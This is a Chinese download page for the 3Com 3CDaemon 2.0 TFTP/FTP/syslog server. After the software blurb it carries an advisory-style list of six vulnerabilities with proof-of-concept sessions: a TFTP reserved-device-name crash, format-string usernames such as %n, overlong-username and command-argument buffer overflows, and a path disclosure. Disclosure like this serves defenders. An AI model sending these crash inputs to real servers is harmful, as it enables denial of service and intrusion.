- 軟件大?。?span>243.00M
- 軟件語言:中文
- 軟件類型:漢化軟件
- 軟件類別:免費軟件 / FTP 工具
- 更新時間:2018-08-29 16:11
- 運行環(huán)境:WinAll, WinXP
- 軟件等級:
- 軟件廠商:
- 官方網(wǎng)站:http://m.aimjoke.net/
220KB/中文/5.0
435KB/中文/10.0
645KB/中文/10.0
715KB/中文/10.0
13.84M/中文/3.3
3COM 3CDaemon是一款多重服務(wù)器功能集成軟件,主要作用于服務(wù)器中,同時還能夠幫助用戶改善相關(guān)的電腦功能,需要的用戶快來綠色資源網(wǎng)下載吧!
3com的這款東西還是很有名很不錯滴~~~3CDaemon是一款免費的集成了TFTP、FTP和SYSLOG功能的應(yīng)用程序;作用于FTP,TFTP,SYSLOG服務(wù)器,TFTP客戶端,雖然還存在很多的問題,但是使用起來還是不錯的!
1、TFTP保留設(shè)備名拒絕服務(wù)攻擊
提交類似如下的請求,可導(dǎo)致TFTP服務(wù)程序掛起:
D:\WINDOWS\system32>tftp -i 192.168.0.1 get prn
The 3CDaemon will be crashed with some msgs like
"Microsoft Visual C++ Runtime library"
"Runtime Error!"
"Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe "
"abnormal program termination".
2、FTP用戶名存在格式串問題
提交包含格式串字符作為用戶名數(shù)據(jù),可導(dǎo)致守護程序崩潰:
H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %n
Connection closed by remote host.
OR:
H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %s
331 User name ok, need password
Password:[anythinghere]
530 Login access denied
Login failed.
ftp>
3、FTP超長用戶名緩沖區(qū)溢出
由于對用戶名缺少正確邊界緩沖區(qū)檢查,提交超長用戶名可導(dǎo)致緩沖區(qū)溢出:
D:\WINDOWS\system32>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)):
501 Invalid or missing parameters
Login failed.
ftp> user AAA..[about 241 A here]...AAAAA
Connection closed by remote host.
4、多個FTP命令超長參數(shù)緩沖區(qū)溢出
cd,send,ls,,put,delete,rename,rmdir,literal,stat,CWD等FTP命令對參數(shù)缺少充分邊界檢查,提交超長字符串作為命令參數(shù)可導(dǎo)致緩沖區(qū)溢出:
ftp> cd AAA..[about 398 A here]...AAAAA
Connection closed by remote host.
ftp>
ftp> ls AAA..[about 247 A here]...AAAAA
200 PORT command successful.
Connection closed by remote host.
ftp> put 1.txt AAA..[about 247 A here]...AAAAA
200 PORT command successful.
532 Need account for storing files
Connection closed by remote host.
5、多個FTP命令存在格式串問題
提交格式字符串作為參數(shù),可導(dǎo)致程序崩潰。
6、多個FTP命令包設(shè)備名信息泄露問題
請求保留設(shè)備名可導(dǎo)致返回程序安裝路徑信息:
ftp> cd aux
550 aux : C:/3cdaemon/aux is not a directory!
ftp> cd lpt1
550 lpt1 : C:/3cdaemon/lpt1 is not a directory!
受影響系統(tǒng):
3Com 3CDaemon 2.0 revision 10
請描述您所遇到的錯誤,我們將盡快予以修正,謝謝!
*必填項,請輸入內(nèi)容